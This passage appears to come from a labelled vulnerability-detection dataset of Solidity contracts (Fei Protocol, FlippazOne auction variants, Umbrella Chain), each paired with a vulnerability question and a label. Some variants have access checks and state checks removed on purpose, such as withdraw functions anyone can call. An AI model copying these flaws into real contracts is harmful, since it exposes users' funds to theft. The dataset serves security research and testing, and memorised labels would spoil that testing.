34     /// @param amountIn amount of underlying tokens input
35     /// @return amountOut amount of FEI received
36     function purchase(address to, uint256 amountIn)
37         external
38         payable
39         override
40         postGenesis
41         whenNotPaused
42         returns (uint256 amountOut)
43     {
44         require(
45             msg.value == amountIn,
46             "Bonding Curve: Sent value does not equal input"
47         );
48         return _purchase(amountIn, to);
49     }

50     function getTotalPCVHeld() public view override returns (uint256) {
51         return address(this).balance;
52     }

53     // Represents the integral solved for upper bound of P(x) = ((k+X)/(k+S))^1/2 * O. Subtracting starting point C
54     function _getBondingCurveAmountOut(uint256 adjustedAmountIn)
55         internal
56         view
57         override
58         returns (uint256 amountOut)
59     {
60         uint256 shiftTotal = _shift(totalPurchased); // k + C
61         uint256 shiftTotalCubed = shiftTotal.mul(shiftTotal.mul(shiftTotal));
62         uint256 radicand =
63             (adjustedAmountIn.mul(3).mul(_shift(scale).sqrt()) / 2).add(
64                 shiftTotalCubed.sqrt()
65             );
66         return (radicand.cubeRoot() ** 2).sub(shiftTotal); // result - (k + C)
67     }

68     // Bonding curve formula is sqrt(k+x)/sqrt(k+S)
69     function _getBondingCurvePriceMultiplier()
70         internal
71         view
72         override
73         returns (Decimal.D256 memory)
74     {
75         return
76             Decimal.ratio(_shift(totalPurchased).sqrt(), _shift(scale).sqrt());
77     }

78     function _allocateSingle(uint256 amount, address pcvDeposit)
79         internal
80         override
81     {
82         IPCVDeposit(pcvDeposit).deposit{value: amount}(amount);
83     }

84     function _shift(uint256 x) internal view returns (uint256) {
85         return SHIFT.add(x);
86     }
87 }
What are the vulnerabilities in the contract?
healthy
<end of text>
1 pragma solidity ^0.6.0;
2 pragma experimental ABIEncoderV2;

3 import "@openzeppelin/contracts/utils/Address.sol";
4 import "./UniswapPCVDeposit.sol";

5 /// @title implementation for an ETH Uniswap LP PCV Deposit
6 /// @author Fei Protocol
7 contract EthUniswapPCVDeposit is UniswapPCVDeposit {
8     using Address for address payable;

9     /// @notice ETH Uniswap PCV Deposit constructor
10     /// @param _core Fei Core for reference
11     /// @param _pair Uniswap Pair to deposit to
12     /// @param _router Uniswap Router
13     /// @param _oracle oracle for reference
14     constructor(
15         address _core,
16         address _pair,
17         address _router,
18         address _oracle
19     ) public UniswapPCVDeposit(_core, _pair, _router, _oracle) {}

20     receive() external payable {}

21     /// @notice deposit tokens into the PCV allocation
22     /// @param ethAmount of tokens deposited
23     function deposit(uint256 ethAmount) external payable override postGenesis whenNotPaused {
24         require(
25             ethAmount == msg.value,
26             "Bonding Curve: Sent value does not equal input"
27         );

28         ethAmount = address(this).balance; // include any ETH dust from prior LP

29         uint256 feiAmount = _getAmountFeiToDeposit(ethAmount);

30         _addLiquidity(ethAmount, feiAmount);

31         _burnFeiHeld(); // burn any FEI dust from LP

32         emit Deposit(msg.sender, ethAmount);
33     }

34     function _removeLiquidity(uint256 liquidity)
35         internal
36         override
37         returns (uint256)
38     {
39         uint256 endOfTime = uint256(-1);
40         (, uint256 amountWithdrawn) =
41             router.removeLiquidityETH(
42                 address(fei()),
43                 liquidity,
44                 0,
45                 0,
46                 address(this),
47                 endOfTime
48             );
49         return amountWithdrawn;
50     }

51     function _transferWithdrawn(address to, uint256 amount) internal override {
52         payable(to).sendValue(amount);
53     }

54     function _addLiquidity(uint256 ethAmount, uint256 feiAmount) internal {
55         _mintFei(feiAmount);

56         uint256 endOfTime = uint256(-1);
57         router.addLiquidityETH{value: ethAmount}(
58             address(fei()),
59             feiAmount,
60             0,
61             0,
62             address(this),
63             endOfTime
64         );
65     }
66 }
What are the vulnerabilities in the contract?
price manipulation
<end of text>
1 contract FlippazOne is ERC721, ERC721URIStorage, Ownable {
2     using Counters for Counters.Counter;

3     Counters.Counter private _tokenIdCounter;

4     string  public              baseURI;
5     address public              proxyRegistryAddress;

6     uint256 public constant     MAX_SUPPLY           = 1;
7     uint256 public              minBidStep           = 0.25 ether;

8     uint256 public constant     buyNowPrice          = 15 ether;
9     uint256 public constant     buyNowPriceUntilBid  = 14.75 ether;
10     uint256 public              buyNowMultiplier     = 20; // 20 = x2
11     bool    public              boughtNow;

12     uint256 public              auctionDuration      = 24 hours;
13     bool    public              auctionStarted;
14     uint256 public              auctionStartTimestamp;
15     bool    public              auctionEnded;
16     uint256 public              auctionEndTimestamp;

17     uint256 public              highestBid          = 0.9 ether;
18     address public              highestBidder;
19     uint256 public              totalSupply         = 0;
    
20     mapping(address => uint) public bids;
21     mapping(address => bool) public projectProxy;

22     mapping(address => bool) public hasAddressBidded;
23     address[] bidAdresses;
24     uint256 totalBidAddresses;
    

25     constructor() ERC721("FlippazOne", "FlippazOne") {
26         proxyRegistryAddress = 0xa5409ec958C83C3f309868babACA7c86DCB077c1;
27         baseURI = "ipfs://QmcrAKPLLZhLWDFA6wpiH9QGEz3wsmedZ4TYWM3vGyLPaX";
28     }

29     function _baseURI() internal view override returns (string memory) {
30         return baseURI;
31     }

32     function editBaseUri(string memory newUri) public onlyOwner{
33         baseURI = newUri;
34     }
    
35     /* Edit admin functions */
36     function editBuyNowMultipler(uint256 newMultiplier) public onlyOwner{
37         buyNowMultiplier = newMultiplier;
38     }

39     function editMinBidStep(uint256 newMinBidStep) public onlyOwner{
40         minBidStep = newMinBidStep;
41     }

42     /// @param newDuration New auction duration in SECONDS
43     function editDuration(uint256 newDuration) public onlyOwner{
44         require(auctionStarted, "Auction has not yet been started");
45         auctionEndTimestamp = auctionStartTimestamp + newDuration;
46         auctionDuration = newDuration;
47     }

48     function isAuctionActive() public view returns(bool){
49         if (auctionStarted){
50             if (!auctionEnded){
51                 return block.timestamp < auctionEndTimestamp;
52             }
53         }
54         return false;
55     }

56     function startAuction() public onlyOwner{
57         require(auctionStarted == false, "Auction is already started");
58         auctionStarted = true;
59         auctionStartTimestamp = block.timestamp;
60         auctionEndTimestamp = block.timestamp + auctionDuration;
61     }

62     function getBidderPaidAmount(address bidder) public view returns(uint256){
63         return bids[bidder];
64     }

65     function getBidderByIndex(uint256 bidderIndex) public view returns(address){
66         return bidAdresses[bidderIndex];
67     }

    
68     function bid() public payable {
69         require(auctionStarted, "Auction has not yet started");
70         require(!auctionEnded, "Auction has been finished");
71         require(!boughtNow, "Auction has been finished");
72         require(block.timestamp < auctionEndTimestamp, "Auction has been finished");

73         uint256 newBid = bids[_msgSender()] + msg.value;
74         require(newBid >= highestBid + minBidStep, "Bid must be at least 0.25 ETH higher than the highest bid");

75         bids[_msgSender()] += msg.value;
76         highestBid = newBid;
77         highestBidder = _msgSender();

78         if (!hasAddressBidded[_msgSender()]){
79             hasAddressBidded[_msgSender()] = true;
80             totalBidAddresses++;
81             bidAdresses.push(_msgSender());
82         }
    
83     }

84     function isBuyNowActive() public view returns(bool){
85         if (auctionStarted){
86             if (!auctionEnded){
87                 if (!boughtNow){
88                     if (block.timestamp < auctionEndTimestamp){
89                             return true;
90                     }
91                 }
92             }
93         }
94         return false;
95     }

96     function getBuyNowPrice() public view returns(uint256){
97         if (highestBid < buyNowPriceUntilBid){
98             return buyNowPrice;
99         } else {
100             uint256 newBuyNowPrice = highestBid * buyNowMultiplier / 10;
101             return newBuyNowPrice;
102         }
103     }

104     function buyNow() public payable {
105         require(auctionStarted, "Auction has not yet started");
106         require(!auctionEnded, "Auction has been finished");
107         require(block.timestamp < auctionEndTimestamp, "Auction has been finished");
108         require(!boughtNow, "Sorry! Somebody already used BUY NOW button");
109         uint256 currentBuyPrice = getBuyNowPrice();
110         require(msg.value == currentBuyPrice - bids[_msgSender()], "Invalid funds provided");
        
111         highestBid = currentBuyPrice;
112         highestBidder = _msgSender();

113         uint256 tokenId = _tokenIdCounter.current();
114         _tokenIdCounter.increment();
115         _mint(_msgSender(), tokenId);
116         boughtNow = true;
117         auctionEnded =  true;
118         totalSupply = 1;
119     }

120     function endAuction() public {
121         require(auctionStarted, "Auction has not yet started");
122         require(!auctionEnded, "You cannot end the action again");
123         require(block.timestamp >= auctionEndTimestamp, "Auction duration has not yet elapsed");
124         uint256 tokenId = _tokenIdCounter.current();
125         _tokenIdCounter.increment();
        
126         if (highestBidder != address(0)){
127             _safeMint(highestBidder, tokenId);
128         } else {
129             _safeMint(owner(), tokenId);
130         }
131         totalSupply = 1;
132         auctionEnded = true;
133     }

134     function refundBids() public {
135         require(auctionEnded, "Please end the auction firstly");
136         for (uint256 i = 0; i < totalBidAddresses; i++){
137             uint256 addressTotalBid = bids[bidAdresses[i]];
138             if ((addressTotalBid > 0) && (bidAdresses[i] != highestBidder)){
139                 (bool success, ) = bidAdresses[i].call{value: addressTotalBid}("");
140                 bids[bidAdresses[i]] = 0;
141             }
142         }
143     }

144     function burn(uint256 tokenId) public { 
145         require(_isApprovedOrOwner(_msgSender(), tokenId), "Not approved to burn.");
146         _burn(tokenId);
147     }

148     function ownerWithdraw() public  {
149         require(auctionEnded || block.timestamp > auctionEndTimestamp, "Cannot withdraw until auction is ended");
150         (bool success, ) = owner().call{value: highestBid}("");
151         require(success, "Failed to withdraw funds.");
152     }

153     function ownerWithdrawTo(address toAddress) public  {
154         require(auctionEnded || block.timestamp > auctionEndTimestamp, "Cannot withdraw until auction is ended");
155         (bool success, ) = toAddress.call{value: highestBid}("");
156         require(success, "Failed to withdraw funds.");
157     }

158     function ownerWithdrawAll() public  {
159         (bool success, ) = owner().call{value: address(this).balance}("");
160         require(success, "Failed to withdraw funds.");
161     }

162     function ownerWithdrawAllTo(address toAddress) public  {
163         (bool success, ) = toAddress.call{value: address(this).balance}("");
164         require(success, "Failed to withdraw funds.");
165     }

166     function bidderWithdraw() public  {
167         uint256 totalBid = getBidderPaidAmount(_msgSender());
168         require(totalBid > 0, "Nothing to withdraw");
169         require(highestBidder != _msgSender(), "You cannot withdraw as your bid is the highest bid");
170         (bool success, ) = _msgSender().call{value: totalBid}("");
171         require(success, "Failed to withdraw funds.");
172         bids[_msgSender()] = 0;
173     }

174     function _burn(uint256 tokenId) internal override(ERC721, ERC721URIStorage) {
175         super._burn(tokenId);
176     }

177     function tokenURI(uint256 tokenId)
178         public
179         view
180         override(ERC721, ERC721URIStorage)
181         returns (string memory)
182     {
183         require(_exists(tokenId), "Token does not exist");
184         return _baseURI();
185     }

186     function isApprovedForAll(address _owner, address operator) public view override(ERC721) returns (bool) {
187         OpenSeaProxyRegistry proxyRegistry = OpenSeaProxyRegistry(proxyRegistryAddress);
188         if (address(proxyRegistry.proxies(_owner)) == operator || projectProxy[operator]) return true;
189         return super.isApprovedForAll(_owner, operator);
190     }
191 }
What are the vulnerabilities in the contract?
incorrect ownership/visibility
<end of text>
1 contract FlippazOne is ERC721, ERC721URIStorage, Ownable {
2     using Counters for Counters.Counter;

3     Counters.Counter private _tokenIdCounter;

4     string  public              baseURI;
5     address public              proxyRegistryAddress;

6     uint256 public constant     MAX_SUPPLY           = 1;
7     uint256 public              minBidStep           = 0.25 ether;

8     uint256 public constant     buyNowPrice          = 15 ether;
9     uint256 public constant     buyNowPriceUntilBid  = 14.75 ether;
10     uint256 public              buyNowMultiplier     = 20; // 20 = x2
11     bool    public              boughtNow;

12     uint256 public              auctionDuration      = 24 hours;
13     bool    public              auctionStarted;
14     uint256 public              auctionStartTimestamp;
15     bool    public              auctionEnded;
16     uint256 public              auctionEndTimestamp;

17     uint256 public              highestBid          = 0.9 ether;
18     address public              highestBidder;
19     uint256 public              totalSupply         = 0;
    
20     mapping(address => uint) public bids;
21     mapping(address => bool) public projectProxy;

22     mapping(address => bool) public hasAddressBidded;
23     address[] bidAdresses;
24     uint256 totalBidAddresses;
    

25     constructor() ERC721("FlippazOne", "FlippazOne") {
26         proxyRegistryAddress = 0xa5409ec958C83C3f309868babACA7c86DCB077c1;
27         baseURI = "ipfs://QmcrAKPLLZhLWDFA6wpiH9QGEz3wsmedZ4TYWM3vGyLPaX";
28     }

29     function _baseURI() internal view override returns (string memory) {
30         return baseURI;
31     }

32     function editBaseUri(string memory newUri) public onlyOwner{
33         baseURI = newUri;
34     }
    
35     /* Edit admin functions */
36     function editBuyNowMultipler(uint256 newMultiplier) public onlyOwner{
37         buyNowMultiplier = newMultiplier;
38     }

39     function editMinBidStep(uint256 newMinBidStep) public onlyOwner{
40         minBidStep = newMinBidStep;
41     }

42     /// @param newDuration New auction duration in SECONDS
43     function editDuration(uint256 newDuration) public onlyOwner{
44         require(auctionStarted, "Auction has not yet been started");
45         auctionEndTimestamp = auctionStartTimestamp + newDuration;
46         auctionDuration = newDuration;
47     }

48     function isAuctionActive() public view returns(bool){
49         if (auctionStarted){
50             if (!auctionEnded){
51                 return block.timestamp < auctionEndTimestamp;
52             }
53         }
54         return false;
55     }

56     function startAuction() public onlyOwner{
57         require(auctionStarted == false, "Auction is already started");
58         auctionStarted = true;
59         auctionStartTimestamp = block.timestamp;
60         auctionEndTimestamp = block.timestamp + auctionDuration;
61     }

62     function getBidderPaidAmount(address bidder) public view returns(uint256){
63         return bids[bidder];
64     }

65     function getBidderByIndex(uint256 bidderIndex) public view returns(address){
66         return bidAdresses[bidderIndex];
67     }

    
68     function bid() public payable {
69         require(auctionStarted, "Auction has not yet started");
70         require(!auctionEnded, "Auction has been finished");
71         require(!boughtNow, "Auction has been finished");
72         require(block.timestamp < auctionEndTimestamp, "Auction has been finished");

73         uint256 newBid = bids[_msgSender()] + msg.value;
74         require(newBid >= highestBid + minBidStep, "Bid must be at least 0.25 ETH higher than the highest bid");

75         bids[_msgSender()] += msg.value;
76         highestBid = newBid;
77         highestBidder = _msgSender();

78         if (!hasAddressBidded[_msgSender()]){
79             hasAddressBidded[_msgSender()] = true;
80             totalBidAddresses++;
81             bidAdresses.push(_msgSender());
82         }
    
83     }

84     function isBuyNowActive() public view returns(bool){
85         if (auctionStarted){
86             if (!auctionEnded){
87                 if (!boughtNow){
88                     if (block.timestamp < auctionEndTimestamp){
89                             return true;
90                     }
91                 }
92             }
93         }
94         return false;
95     }

96     function getBuyNowPrice() public view returns(uint256){
97         if (highestBid < buyNowPriceUntilBid){
98             return buyNowPrice;
99         } else {
100             uint256 newBuyNowPrice = highestBid * buyNowMultiplier / 10;
101             return newBuyNowPrice;
102         }
103     }

104     function buyNow() public payable {
105         uint256 currentBuyPrice = getBuyNowPrice();
106         require(msg.value == currentBuyPrice - bids[_msgSender()], "Invalid funds provided");
        
107         highestBid = currentBuyPrice;
108         highestBidder = _msgSender();

109         uint256 tokenId = _tokenIdCounter.current();
110         _tokenIdCounter.increment();
111         _mint(_msgSender(), tokenId);
112         boughtNow = true;
113         auctionEnded =  true;
114         totalSupply = 1;
115     }

116     function endAuction() public {
     
117         uint256 tokenId = _tokenIdCounter.current();
118         _tokenIdCounter.increment();
        
119         if (highestBidder != address(0)){
120             _safeMint(highestBidder, tokenId);
121         } else {
122             _safeMint(owner(), tokenId);
123         }
124         totalSupply = 1;
125         auctionEnded = true;
126     }

127     function refundBids() public {
128         for (uint256 i = 0; i < totalBidAddresses; i++){
129             uint256 addressTotalBid = bids[bidAdresses[i]];
130             if ((addressTotalBid > 0) && (bidAdresses[i] != highestBidder)){
131                 (bool success, ) = bidAdresses[i].call{value: addressTotalBid}("");
132                 bids[bidAdresses[i]] = 0;
133             }
134         }
135     }

136     function burn(uint256 tokenId) public { 
137         require(_isApprovedOrOwner(_msgSender(), tokenId), "Not approved to burn.");
138         _burn(tokenId);
139     }

140     function ownerWithdraw() public  {       
141         (bool success, ) = owner().call{value: highestBid}("");
142         require(success, "Failed to withdraw funds.");
143     }

144     function ownerWithdrawTo(address toAddress) public  {       
145         (bool success, ) = toAddress.call{value: highestBid}("");
146         require(success, "Failed to withdraw funds.");
147     }

148     function ownerWithdrawAll() public  {
149         (bool success, ) = owner().call{value: address(this).balance}("");
150         require(success, "Failed to withdraw funds.");
151     }

152     function ownerWithdrawAllTo(address toAddress) public onlyOwner {
153         (bool success, ) = toAddress.call{value: address(this).balance}("");
154         require(success, "Failed to withdraw funds.");
155     }

156     function bidderWithdraw() public  {
157         uint256 totalBid = getBidderPaidAmount(_msgSender());
158         require(totalBid > 0, "Nothing to withdraw");
159         require(highestBidder != _msgSender(), "You cannot withdraw as your bid is the highest bid");
160         (bool success, ) = _msgSender().call{value: totalBid}("");
161         require(success, "Failed to withdraw funds.");
162         bids[_msgSender()] = 0;
163     }

164     function _burn(uint256 tokenId) internal override(ERC721, ERC721URIStorage) {
165         super._burn(tokenId);
166     }

167     function tokenURI(uint256 tokenId)
168         public
169         view
170         override(ERC721, ERC721URIStorage)
171         returns (string memory)
172     {
173         require(_exists(tokenId), "Token does not exist");
174         return _baseURI();
175     }

176     function isApprovedForAll(address _owner, address operator) public view override(ERC721) returns (bool) {
177         OpenSeaProxyRegistry proxyRegistry = OpenSeaProxyRegistry(proxyRegistryAddress);
178         if (address(proxyRegistry.proxies(_owner)) == operator || projectProxy[operator]) return true;
179         return super.isApprovedForAll(_owner, operator);
180     }
181 }
What are the vulnerabilities in the contract?
atomicity violation
<end of text>
1 contract FlippazOne is ERC721, ERC721URIStorage, Ownable {
2     using Counters for Counters.Counter;

3     Counters.Counter private _tokenIdCounter;

4     string  public              baseURI;
5     address public              proxyRegistryAddress;

6     uint256 public constant     MAX_SUPPLY           = 1;
7     uint256 public              minBidStep           = 0.25 ether;

8     uint256 public constant     buyNowPrice          = 15 ether;
9     uint256 public constant     buyNowPriceUntilBid  = 14.75 ether;
10     uint256 public              buyNowMultiplier     = 20; // 20 = x2
11     bool    public              boughtNow;

12     uint256 public              auctionDuration      = 24 hours;
13     bool    public              auctionStarted;
14     uint256 public              auctionStartTimestamp;
15     bool    public              auctionEnded;
16     uint256 public              auctionEndTimestamp;

17     uint256 public              highestBid          = 0.9 ether;
18     address public              highestBidder;
19     uint256 public              totalSupply         = 0;
    
20     mapping(address => uint) public bids;
21     mapping(address => bool) public projectProxy;

22     mapping(address => bool) public hasAddressBidded;
23     address[] bidAdresses;
24     uint256 totalBidAddresses;
    

25     constructor() ERC721("FlippazOne", "FlippazOne") {
26         proxyRegistryAddress = 0xa5409ec958C83C3f309868babACA7c86DCB077c1;
27         baseURI = "ipfs://QmcrAKPLLZhLWDFA6wpiH9QGEz3wsmedZ4TYWM3vGyLPaX";
28     }

29     function _baseURI() internal view override returns (string memory) {
30         return baseURI;
31     }

32     function editBaseUri(string memory newUri) public onlyOwner{
33         baseURI = newUri;
34     }
    
35     /* Edit admin functions */
36     function editBuyNowMultipler(uint256 newMultiplier) public onlyOwner{
37         buyNowMultiplier = newMultiplier;
38     }

39     function editMinBidStep(uint256 newMinBidStep) public onlyOwner{
40         minBidStep = newMinBidStep;
41     }

42     /// @param newDuration New auction duration in SECONDS
43     function editDuration(uint256 newDuration) public onlyOwner{
44         require(auctionStarted, "Auction has not yet been started");
45         auctionEndTimestamp = auctionStartTimestamp + newDuration;
46         auctionDuration = newDuration;
47     }

48     function isAuctionActive() public view returns(bool){
49         if (auctionStarted){
50             if (!auctionEnded){
51                 return block.timestamp < auctionEndTimestamp;
52             }
53         }
54         return false;
55     }

56     function startAuction() public onlyOwner{
57         require(auctionStarted == false, "Auction is already started");
58         auctionStarted = true;
59         auctionStartTimestamp = block.timestamp;
60         auctionEndTimestamp = block.timestamp + auctionDuration;
61     }

62     function getBidderPaidAmount(address bidder) public view returns(uint256){
63         return bids[bidder];
64     }

65     function getBidderByIndex(uint256 bidderIndex) public view returns(address){
66         return bidAdresses[bidderIndex];
67     }

    
68     function bid() public payable {
69         require(auctionStarted, "Auction has not yet started");
70         require(!auctionEnded, "Auction has been finished");
71         require(!boughtNow, "Auction has been finished");
72         require(block.timestamp < auctionEndTimestamp, "Auction has been finished");

73         uint256 newBid = bids[_msgSender()] + msg.value;
74         require(newBid >= highestBid + minBidStep, "Bid must be at least 0.25 ETH higher than the highest bid");

75         bids[_msgSender()] += msg.value;
76         highestBid = newBid;
77         highestBidder = _msgSender();

78         if (!hasAddressBidded[_msgSender()]){
79             hasAddressBidded[_msgSender()] = true;
80             totalBidAddresses++;
81             bidAdresses.push(_msgSender());
82         }
    
83     }

84     function isBuyNowActive() public view returns(bool){
85         if (auctionStarted){
86             if (!auctionEnded){
87                 if (!boughtNow){
88                     if (block.timestamp < auctionEndTimestamp){
89                             return true;
90                     }
91                 }
92             }
93         }
94         return false;
95     }

96     function getBuyNowPrice() public view returns(uint256){
97         if (highestBid < buyNowPriceUntilBid){
98             return buyNowPrice;
99         } else {
100             uint256 newBuyNowPrice = highestBid * buyNowMultiplier / 10;
101             return newBuyNowPrice;
102         }
103     }

104     function buyNow() public payable {
105         uint256 currentBuyPrice = getBuyNowPrice();
106         require(msg.value == currentBuyPrice - bids[_msgSender()], "Invalid funds provided");
        
107         highestBid = currentBuyPrice;
108         highestBidder = _msgSender();

109         uint256 tokenId = _tokenIdCounter.current();
110         _tokenIdCounter.increment();
111         _mint(_msgSender(), tokenId);
112         boughtNow = true;
113         auctionEnded =  true;
114         totalSupply = 1;
115     }

116     function endAuction() public {
     
117         uint256 tokenId = _tokenIdCounter.current();
118         _tokenIdCounter.increment();
        
119         if (highestBidder != address(0)){
120             _safeMint(highestBidder, tokenId);
121         } else {
122             _safeMint(owner(), tokenId);
123         }
124         totalSupply = 1;
125         auctionEnded = true;
126     }

127     function refundBids() public {
128         for (uint256 i = 0; i < totalBidAddresses; i++){
129             uint256 addressTotalBid = bids[bidAdresses[i]];
130             if ((addressTotalBid > 0) && (bidAdresses[i] != highestBidder)){
131                 (bool success, ) = bidAdresses[i].call{value: addressTotalBid}("");
132                 bids[bidAdresses[i]] = 0;
133             }
134         }
135     }

136     function burn(uint256 tokenId) public { 
137         require(_isApprovedOrOwner(_msgSender(), tokenId), "Not approved to burn.");
138         _burn(tokenId);
139     }

140     function ownerWithdraw() public  {       
141         (bool success, ) = owner().call{value: highestBid}("");
142         require(success, "Failed to withdraw funds.");
143     }

144     function ownerWithdrawTo(address toAddress) public  {       
145         (bool success, ) = toAddress.call{value: highestBid}("");
146         require(success, "Failed to withdraw funds.");
147     }

148     function ownerWithdrawAll() public  {
149         (bool success, ) = owner().call{value: address(this).balance}("");
150         require(success, "Failed to withdraw funds.");
151     }

152     function ownerWithdrawAllTo(address toAddress) public {
153         (bool success, ) = toAddress.call{value: address(this).balance}("");
154         require(success, "Failed to withdraw funds.");
155     }

156     function bidderWithdraw() public  {
157         uint256 totalBid = getBidderPaidAmount(_msgSender());
158         require(totalBid > 0, "Nothing to withdraw");
159         require(highestBidder != _msgSender(), "You cannot withdraw as your bid is the highest bid");
160         (bool success, ) = _msgSender().call{value: totalBid}("");
161         require(success, "Failed to withdraw funds.");
162         bids[_msgSender()] = 0;
163     }

164     function _burn(uint256 tokenId) internal override(ERC721, ERC721URIStorage) {
165         super._burn(tokenId);
166     }

167     function tokenURI(uint256 tokenId)
168         public
169         view
170         override(ERC721, ERC721URIStorage)
171         returns (string memory)
172     {
173         require(_exists(tokenId), "Token does not exist");
174         return _baseURI();
175     }

176     function isApprovedForAll(address _owner, address operator) public view override(ERC721) returns (bool) {
177         OpenSeaProxyRegistry proxyRegistry = OpenSeaProxyRegistry(proxyRegistryAddress);
178         if (address(proxyRegistry.proxies(_owner)) == operator || projectProxy[operator]) return true;
179         return super.isApprovedForAll(_owner, operator);
180     }
181 }
What are the vulnerabilities in the contract?
atomicity violation
incorrect ownership/visibility
<end of text>
1 // SPDX-License-Identifier: MIT
2 pragma solidity ^0.6.8;
3 pragma experimental ABIEncoderV2;

4 import "./openzeppelin/contracts/access/Ownable.sol";
5 import "./umb-network/toolbox/dist/contracts/lib/ValueDecoder.sol";

6 import "./interfaces/IStakingBank.sol";

7 import "./BaseChain.sol";

8 contract Chain is BaseChain {
9   IStakingBank public immutable stakingBank;

10   // ========== EVENTS ========== //

11   event LogMint(address indexed minter, uint256 blockId, uint256 staked, uint256 power);
12   event LogVoter(uint256 indexed blockId, address indexed voter, uint256 vote);

13   // ========== CONSTRUCTOR ========== //

14   constructor(
15     address _contractRegistry,
16     uint16 _padding,
17     uint16 _requiredSignatures
18   ) public BaseChain(_contractRegistry, _padding, _requiredSignatures) {
19     // we not changing SB address that often, so lets save it once, it will save 10% gas
20     stakingBank = stakingBankContract();
21   }

22   // ========== VIEWS ========== //

23   function isForeign() override external pure returns (bool) {
24     return false;
25   }

26   function getName() override external pure returns (bytes32) {
27     return "Chain";
28   }

29   function getStatus() external view returns(
30     uint256 blockNumber,
31     uint16 timePadding,
32     uint32 lastDataTimestamp,
33     uint32 lastBlockId,
34     address nextLeader,
35     uint32 nextBlockId,
36     address[] memory validators,
37     uint256[] memory powers,
38     string[] memory locations,
39     uint256 staked,
40     uint16 minSignatures
41   ) {
42     blockNumber = block.number;
43     timePadding = padding;
44     lastBlockId = getLatestBlockId();
45     lastDataTimestamp = squashedRoots[lastBlockId].extractTimestamp();
46     minSignatures = requiredSignatures;

47     staked = stakingBank.totalSupply();
48     uint256 numberOfValidators = stakingBank.getNumberOfValidators();
49     powers = new uint256[](numberOfValidators);
50     validators = new address[](numberOfValidators);
51     locations = new string[](numberOfValidators);

52     for (uint256 i = 0; i < numberOfValidators; i++) {
53       validators[i] = stakingBank.addresses(i);
54       (, locations[i]) = stakingBank.validators(validators[i]);
55       powers[i] = stakingBank.balanceOf(validators[i]);
56     }

57     nextBlockId = getBlockIdAtTimestamp(block.timestamp + 1);

58     nextLeader = numberOfValidators > 0
59       ? validators[getLeaderIndex(numberOfValidators, block.timestamp + 1)]
60       : address(0);
61   }

62   function getNextLeaderAddress() external view returns (address) {
63     return getLeaderAddressAtTime(block.timestamp + 1);
64   }

65   function getLeaderAddress() external view returns (address) {
66     return getLeaderAddressAtTime(block.timestamp);
67   }

68   // ========== MUTATIVE FUNCTIONS ========== //

69   // solhint-disable-next-line function-max-lines
70   function submit(
71     uint32 _dataTimestamp,
72     bytes32 _root,
73     bytes32[] memory _keys,
74     uint256[] memory _values,
75     uint8[] memory _v,
76     bytes32[] memory _r,
77     bytes32[] memory _s
78   ) public { // it could be external, but for external we got stack too deep
79     uint32 lastBlockId = getLatestBlockId();
80     uint32 dataTimestamp = squashedRoots[lastBlockId].extractTimestamp();

81     require(dataTimestamp + padding < block.timestamp, "do not spam");
82     require(dataTimestamp < _dataTimestamp, "can NOT submit older data");
83     // we can't expect minter will have exactly the same timestamp
84     // but for sure we can demand not to be off by a lot, that's why +3sec
85     // temporary remove this condition, because recently on ropsten we see cases when minter/node
86     // can be even 100sec behind
87     // require(_dataTimestamp <= block.timestamp + 3,
88     //   string(abi.encodePacked("oh, so you can predict the future:", _dataTimestamp - block.timestamp + 48)));
89     require(_keys.length == _values.length, "numbers of keys and values not the same");

90     bytes memory testimony = abi.encodePacked(_dataTimestamp, _root);

91     for (uint256 i = 0; i < _keys.length; i++) {
92       require(uint224(_values[i]) == _values[i], "FCD overflow");
93       fcds[_keys[i]] = FirstClassData(uint224(_values[i]), _dataTimestamp);
94       testimony = abi.encodePacked(testimony, _keys[i], _values[i]);
95     }

96     bytes32 affidavit = keccak256(testimony);
97     uint256 power = 0;

98     uint256 staked = stakingBank.totalSupply();
99     address prevSigner = address(0x0);

100     uint256 i = 0;

101     for (; i < _v.length; i++) {
102       address signer = recoverSigner(affidavit, _v[i], _r[i], _s[i]);
103       uint256 balance = stakingBank.balanceOf(signer);

104       require(prevSigner < signer, "validator included more than once");
105       prevSigner = signer;
106       if (balance == 0) continue;

107       emit LogVoter(lastBlockId + 1, signer, balance);
108       power += balance; // no need for safe math, if we overflow then we will not have enough power
109     }

110     require(i >= requiredSignatures, "not enough signatures");
111     // we turn on power once we have proper DPoS
112     // require(power * 100 / staked >= 66, "not enough power was gathered");

113     squashedRoots[lastBlockId + 1] = _root.makeSquashedRoot(_dataTimestamp);
114     blocksCount++;

115     emit LogMint(msg.sender, lastBlockId + 1, staked, power);
116   }

117   function getLeaderIndex(uint256 _numberOfValidators, uint256 _timestamp) public view returns (uint256) {
118     uint32 latestBlockId = getLatestBlockId();

119     // timePadding + 1 => because padding is a space between blocks, so next round starts on first block after padding
120     uint256 validatorIndex = latestBlockId +
121       (_timestamp - squashedRoots[latestBlockId].extractTimestamp()) / (padding + 1);

122     return uint16(validatorIndex % _numberOfValidators);
123   }

124   // @todo - properly handled non-enabled validators, newly added validators, and validators with low stake
125   function getLeaderAddressAtTime(uint256 _timestamp) public view returns (address) {
126     uint256 numberOfValidators = stakingBank.getNumberOfValidators();

127     if (numberOfValidators == 0) {
128       return address(0x0);
129     }

130     uint256 validatorIndex = getLeaderIndex(numberOfValidators, _timestamp);

131     return stakingBank.addresses(validatorIndex);
132   }
133 }
What are the vulnerabilities in the contract?
incorrect ownership/visibility
<end of text>
1 /**
2  *Submitted for verification at FtmScan.com on 2021-08-31
3 */

4 // SPDX-License-Identifier: MIT
5 // File: @openzeppelin/contracts/GSN/Context.sol


6 pragma solidity ^0.6.0;

7 /**
8  * @dev Implementation of a vault to deposit funds for yield optimizing.
9  * This is the contract that receives funds and that users interface with.
10  * The yield optimizing strategy itself is implemented in a separate 'Strategy.sol' contract.
11  */
12 contract GrimBoostVault is ERC20, Ownable, ReentrancyGuard {
13     using SafeERC20 for IERC20;
14     using SafeMath for uint256;

15     struct StratCandidate {
16         address implementation;
17         uint proposedTime;
18     }

19     // The last proposed strategy to switch to.
20     StratCandidate public stratCandidate;
21     // The strategy currently in use by the vault.
22     IStrategy public strategy;
23     // The minimum time it has to pass before a strat candidate can be approved.
24     uint256 public immutable approvalDelay;

25     event NewStratCandidate(address implementation);
26     event UpgradeStrat(address implementation);

27     /**
28      * @dev Sets the value of {token} to the token that the vault will
29      * hold as underlying value. It initializes the vault's own 'moo' token.
30      * This token is minted when someone does a deposit. It is burned in order
31      * to withdraw the corresponding portion of the underlying assets.
32      * @param _strategy the address of the strategy.
33      * @param _name the name of the vault token.
34      * @param _symbol the symbol of the vault token.
